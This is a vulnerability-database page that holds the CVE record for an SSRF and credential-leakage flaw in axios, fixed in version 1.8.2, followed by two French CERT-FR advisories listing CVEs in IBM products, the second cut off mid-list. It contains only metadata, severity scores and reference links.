Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-27152 (GCVE-0-2025-27152)
Vulnerability from cvelistv5
Published
2025-03-07 15:13
Modified
2025-03-07 19:32
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Summary
axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.
References
| URL | Tags | ||
|---|---|---|---|
|
|
|||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-27152",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-07T19:32:00.779211Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-07T19:32:17.511Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "axios",
"vendor": "axios",
"versions": [
{
"status": "affected",
"version": "\u003c 1.8.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-03-07T15:13:15.155Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"
},
{
"name": "https://github.com/axios/axios/issues/6463",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/axios/axios/issues/6463"
}
],
"source": {
"advisory": "GHSA-jr5f-v2jv-69x6",
"discovery": "UNKNOWN"
},
"title": "Possible SSRF and Credential Leakage via Absolute URL in axios Requests"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-27152",
"datePublished": "2025-03-07T15:13:15.155Z",
"dateReserved": "2025-02-19T16:30:47.779Z",
"dateUpdated": "2025-03-07T19:32:17.511Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-27152\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-03-07T16:15:38.773\",\"lastModified\":\"2025-09-22T18:52:22.807\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.\"},{\"lang\":\"es\",\"value\":\"axios es un cliente HTTP basado en promesas para el navegador y node.js. El problema ocurre cuando se pasan URL absolutas en lugar de URL relativas al protocolo a axios. Incluso si se configura ?baseURL, axios env\u00eda la solicitud a la URL absoluta especificada, lo que puede provocar una fuga de credenciales y SSRF. Este problema afecta tanto al uso del lado del servidor como del lado del cliente de axios. Este problema se solucion\u00f3 en 1.8.2.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"0.30.0\",\"matchCriteriaId\":\"22E658DD-EA2E-454A-BEB1-3B9BC30D017E\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:axios:axios:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"1.0.0\",\"versionEndIncluding\":\"1.7.9\",\"matchCriteriaId\":\"2EFCE157-4712-4CC5-8DB4-9ACCC8C1016E\"}]}]}],\"references\":[{\"url\":\"https://github.com/axios/axios/issues/6463\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Broken Link\"]},{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-27152\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-03-07T19:32:00.779211Z\"}}}], \"references\": [{\"url\": \"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-03-07T19:32:13.477Z\"}}], \"cna\": {\"title\": \"Possible SSRF and Credential Leakage via Absolute URL in axios Requests\", \"source\": {\"advisory\": \"GHSA-jr5f-v2jv-69x6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"axios\", \"product\": \"axios\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.8.2\"}]}], \"references\": [{\"url\": \"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\", \"name\": \"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/axios/axios/issues/6463\", \"name\": \"https://github.com/axios/axios/issues/6463\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \\u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-03-07T15:13:15.155Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-27152\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-03-07T19:32:17.511Z\", \"dateReserved\": \"2025-02-19T16:30:47.779Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-03-07T15:13:15.155Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
CERTFR-2025-AVI-0337
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling | Sterling Connect:Direct Web Services versions 6.1.x antérieures à 6.1.0.28 | ||
| IBM | QRadar | QRadar Suite Software versions 1.1x.x.x antérieures à 1.11.2.x | ||
| IBM | Cloud Pak | Cloud Pak for Security versions 1.1x.x.x antérieures à 1.11.2.x | ||
| IBM | QRadar | SOAR QRadar Plugin App versions antérieures à 5.6.0 |
References
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Sterling Connect:Direct Web Services versions 6.1.x ant\u00e9rieures \u00e0 6.1.0.28",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Suite Software versions 1.1x.x.x ant\u00e9rieures \u00e0 1.11.2.x",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cloud Pak for Security versions 1.1x.x.x ant\u00e9rieures \u00e0 1.11.2.x",
"product": {
"name": "Cloud Pak",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "SOAR QRadar Plugin App versions ant\u00e9rieures \u00e0 5.6.0",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-42459",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42459"
},
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2024-6531",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6531"
},
{
"name": "CVE-2024-22201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22201"
},
{
"name": "CVE-2023-1370",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1370"
},
{
"name": "CVE-2024-55565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-55565"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2020-35494",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35494"
},
{
"name": "CVE-2020-15250",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15250"
},
{
"name": "CVE-2024-23944",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23944"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"name": "CVE-2024-21068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21068"
},
{
"name": "CVE-2020-35496",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35496"
},
{
"name": "CVE-2024-21534",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21534"
},
{
"name": "CVE-2024-42460",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42460"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2024-45813",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45813"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2023-45133",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45133"
},
{
"name": "CVE-2025-21613",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21613"
},
{
"name": "CVE-2024-12798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12798"
},
{
"name": "CVE-2023-25584",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25584"
},
{
"name": "CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"name": "CVE-2025-22866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22866"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2024-29018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29018"
},
{
"name": "CVE-2024-8184",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8184"
},
{
"name": "CVE-2025-1302",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1302"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-21538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
},
{
"name": "CVE-2024-45336",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45336"
},
{
"name": "CVE-2024-48948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48948"
},
{
"name": "CVE-2024-0450",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0450"
},
{
"name": "CVE-2024-12801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12801"
},
{
"name": "CVE-2018-18700",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-18700"
},
{
"name": "CVE-2024-47554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47554"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2024-6763",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6763"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2019-16163",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16163"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2023-51775",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51775"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2023-52428",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52428"
},
{
"name": "CVE-2024-10041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10041"
},
{
"name": "CVE-2023-1972",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1972"
},
{
"name": "CVE-2025-26791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26791"
},
{
"name": "CVE-2024-10963",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10963"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2023-25588",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25588"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2020-35495",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35495"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2024-42461",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42461"
},
{
"name": "CVE-2024-29180",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29180"
},
{
"name": "CVE-2019-12972",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12972"
},
{
"name": "CVE-2025-1094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1094"
},
{
"name": "CVE-2023-25585",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25585"
},
{
"name": "CVE-2025-21614",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21614"
},
{
"name": "CVE-2025-21502",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21502"
},
{
"name": "CVE-2020-35507",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35507"
},
{
"name": "CVE-2020-35493",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35493"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2018-12699",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12699"
},
{
"name": "CVE-2024-57699",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57699"
}
],
"initial_release_date": "2025-04-18T00:00:00",
"last_revision_date": "2025-04-18T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0337",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-04-18T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Injection SQL (SQLi)"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-04-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7230739",
"url": "https://www.ibm.com/support/pages/node/7230739"
},
{
"published_at": "2025-04-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7231169",
"url": "https://www.ibm.com/support/pages/node/7231169"
},
{
"published_at": "2025-04-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7231051",
"url": "https://www.ibm.com/support/pages/node/7231051"
}
]
}
CERTFR-2025-AVI-0512
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Security QRadar EDR | Security QRadar EDR versions antérieures à 3.12.16 | ||
| IBM | Db2 | Db2 versions antérieures à 5.2.0 pour Cloud Pak for Data | ||
| IBM | Cognos Analytics | Cognos Analytics versions 12.0.x antérieures à 12.0.4 FP1 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 11.2.x antérieures à 11.2.4 IF4 | ||
| IBM | Db2 Warehouse | Db2 warehouse versions antérieures à 5.2.0 pour Cloud Pak for Data |
References
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Security QRadar EDR versions ant\u00e9rieures \u00e0 3.12.16",
"product": {
"name": "Security QRadar EDR",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 versions ant\u00e9rieures \u00e0 5.2.0 pour Cloud Pak for Data",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 12.0.x ant\u00e9rieures \u00e0 12.0.4 FP1",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 11.2.x ant\u00e9rieures \u00e0 11.2.4 IF4",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 warehouse versions ant\u00e9rieures \u00e0 5.2.0 pour Cloud Pak for Data",
"product": {
"name": "Db2 Warehouse",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-0917",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0917"
},
{
"name": "CVE-2018-19361",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19361"
},
{
"name": "CVE-2023-29483",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29483"
},
{
"name": "CVE-2021-33036",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33036"
},
{
"name": "CVE-2019-17267",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17267"
},
{
"name": "CVE-2024-22201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22201"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2018-14719",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14719"
},
{
"name": "CVE-2020-9546",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9546"
},
{
"name": "CVE-2024-28757",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28757"
},
{
"name": "CVE-2025-47944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47944"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2025-30065",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30065"
},
{
"name": "CVE-2025-27219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27219"
},
{
"name": "CVE-2024-25638",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25638"
},
{
"name": "CVE-2023-45853",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45853"
},
{
"name": "CVE-2017-9047",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-9047"
},
{
"name": "CVE-2020-9548",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9548"
},
{
"name": "CVE-2023-45288",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45288"
},
{
"name": "CVE-2023-45178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45178"
},
{
"name": "CVE-2024-47076",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47076"
},
{
"name": "CVE-2024-47177",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47177"
},
{
"name": "CVE-2022-30635",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30635"
},
{
"name": "CVE-2022-26612",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26612"
},
{
"name": "CVE-2024-56171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56171"
},
{
"name": "CVE-2024-1975",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1975"
},
{
"name": "CVE-2024-47561",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47561"
},
{
"name": "CVE-2019-16942",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16942"
},
{
"name": "CVE-2024-31881",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31881"
},
{
"name": "CVE-2020-9547",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9547"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2018-14718",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14718"
},
{
"name": "CVE-2025-0923",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0923"
},
{
"name": "CVE-2024-29857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29857"
},
{
"name": "CVE-2018-19360",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19360"
},
{
"name": "CVE-2024-1737",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1737"
},
{
"name": "CVE-2024-31880",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31880"
},
{
"name": "CVE-2024-29025",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29025"
},
{
"name": "CVE-2019-16335",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16335"
},
{
"name": "CVE-2024-28762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28762"
},
{
"name": "CVE-2018-7489",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-7489"
},
{
"name": "CVE-2019-14893",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14893"
},
{
"name": "CVE-2023-50298",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50298"
},
{
"name": "CVE-2024-26308",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26308"
},
{
"name": "CVE-2024-53197",
